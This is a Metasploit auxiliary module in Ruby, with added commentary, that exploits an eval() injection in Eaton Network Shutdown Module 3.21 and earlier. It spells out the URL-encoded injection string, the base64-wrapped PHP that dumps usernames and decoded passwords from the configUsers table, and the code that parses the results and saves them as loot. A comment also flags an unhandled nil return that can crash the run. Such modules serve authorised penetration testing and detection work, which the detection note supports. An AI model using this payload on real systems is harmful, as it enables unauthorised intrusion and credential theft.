##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary gather module for the Eaton Network Shutdown Module (NSM).
#
# Flow, as implemented below:
#   1. execute_php_code wraps a PHP snippet into a single HTTP request against
#      /view_list.php (GET parameter paneStatusListSortBy carries the injection,
#      a randomly named POST parameter carries the base64-encoded snippet).
#   2. read_credentials sends a snippet that prints rows from the configUsers
#      table, delimited by a random 10-digit marker, and scans the body for them.
#   3. run prints the recovered pairs as a table and stores them as CSV loot.
#
# Detection note: the request shape is fixed — a POST to /view_list.php whose
# paneStatusListSortBy query value contains "eval(base64_decode(" — so web
# server / WAF logs for that path and parameter are the natural place to look.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the single option this module adds.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Network Shutdown Module sort_values Credential Dumper',
      'Description' => %q{
        This module will extract user credentials from Network Shutdown Module
        versions 3.21 and earlier by exploiting a vulnerability found in
        lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
        Please note that in order to extract credentials, the vulnerable service
        must have at least one USV module (an entry in the "nodes" table in
        mgedb.db).
      },
      'References' =>
        [
          ['OSVDB', '83199'],
          ['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
        ],
      'Author' =>
        [
          'h0ng10',
          'sinn3r'
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2012-06-26'
    ))

    # Only RPORT is overridden; RHOST(S) and the rest come from HttpClient.
    register_options(
      [
        Opt::RPORT(4679)
      ])
  end

  # Sends one request that delivers +code+ to the vulnerable eval() sink.
  #
  # The GET parameter closes the string/array context in the target's sort
  # expression and appends eval(base64_decode($_POST[<random name>])), while
  # the POST body carries the base64-encoded PHP under that random name.
  # Both the parameter name and the leading padding are randomized per call.
  #
  # @param code [String] PHP source to execute on the target
  # @param opts [Hash] accepted for interface compatibility; not read here
  # @return [Rex::Proto::Http::Response, nil] whatever send_request_cgi returns
  #   (nil on connection failure)
  def execute_php_code(code, opts = {})
    param_name = Rex::Text.rand_text_alpha(6)
    padding = Rex::Text.rand_text_alpha(6)
    php_code = Rex::Text.encode_base64(code)
    # URL-encoded: <padding>"], eval(base64_decode($_POST['<param_name>']));//
    url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
        'uri' => '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
            'paneStatusListSortBy' => url_param,
          },
        'vars_post' =>
          {
            param_name => php_code,
          },
        'headers' =>
          {
            'Connection' => 'Close'
          }
      })
    res
  end

  # Dumps login/password pairs from the configUsers table.
  #
  # The injected PHP prints, for each row, <pattern><login><pattern><pwd><pattern>
  # where +pattern+ is a random 10-digit marker, then calls die() so no page
  # markup follows. The response body is scanned for that marker layout.
  #
  # @return [Array<Array(String, String)>] [login, password] pairs found in the
  #   body, or nil when the request failed or did not return HTTP 200.
  #   NOTE(review): the nil return is not handled by +run+, which calls
  #   +credentials.empty?+ directly — a failed request there raises
  #   NoMethodError rather than printing the "No credentials" warning.
  def read_credentials
    pattern = Rex::Text.rand_text_numeric(10)
    users_var = Rex::Text.rand_text_alpha(10)
    user_var = Rex::Text.rand_text_alpha(10)
    # queryDB and the stored-password encoding (base64) are assumptions about
    # the target's lib/dbtools.inc; they are not verifiable from this file.
    php = <<-EOT
    $#{users_var} = &queryDB("SELECT * FROM configUsers;");
    foreach($#{users_var} as $#{user_var}) {
      print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
    } die();
    EOT

    print_status("Reading user credentials from the database")
    response = execute_php_code(php)

    # send_request_cgi yields nil when the connection fails; anything but 200
    # is treated as "the injection did not run".
    if not response or response.code != 200 then
      print_error("Failed: Error requesting page")
      return
    end

    # Each capture group sits between two 10-digit markers: [login, password].
    credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
    return credentials
  end

  # Module entry point: collect, display and store the credentials.
  #
  # Output is written as a Rex table to the console and persisted as CSV loot
  # keyed on datastore['RHOST'].
  def run
    credentials = read_credentials
    if credentials.empty?
      print_warning("No credentials collected.")
      print_warning("Sometimes this is because the server isn't in the vulnerable state.")
      return
    end

    cred_table = Rex::Text::Table.new(
      'Header' => 'Network Shutdown Module Credentials',
      'Indent' => 1,
      'Columns' => ['Username', 'Password']
    )

    # record[0] is the login, record[1] the decoded password (see read_credentials).
    credentials.each do |record|
      cred_table << [record[0], record[1]]
    end

    print_line
    print_line(cred_table.to_s)

    loot_name = "eaton.nsm.credentials"
    loot_type = "text/csv"
    loot_filename = "eaton_nsm_creds.csv"
    loot_desc = "Eaton Network Shutdown Module Credentials"
    # store_loot returns the on-disk path of the saved file.
    p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)
    print_good("Credentials saved in: #{p.to_s}")
  end
end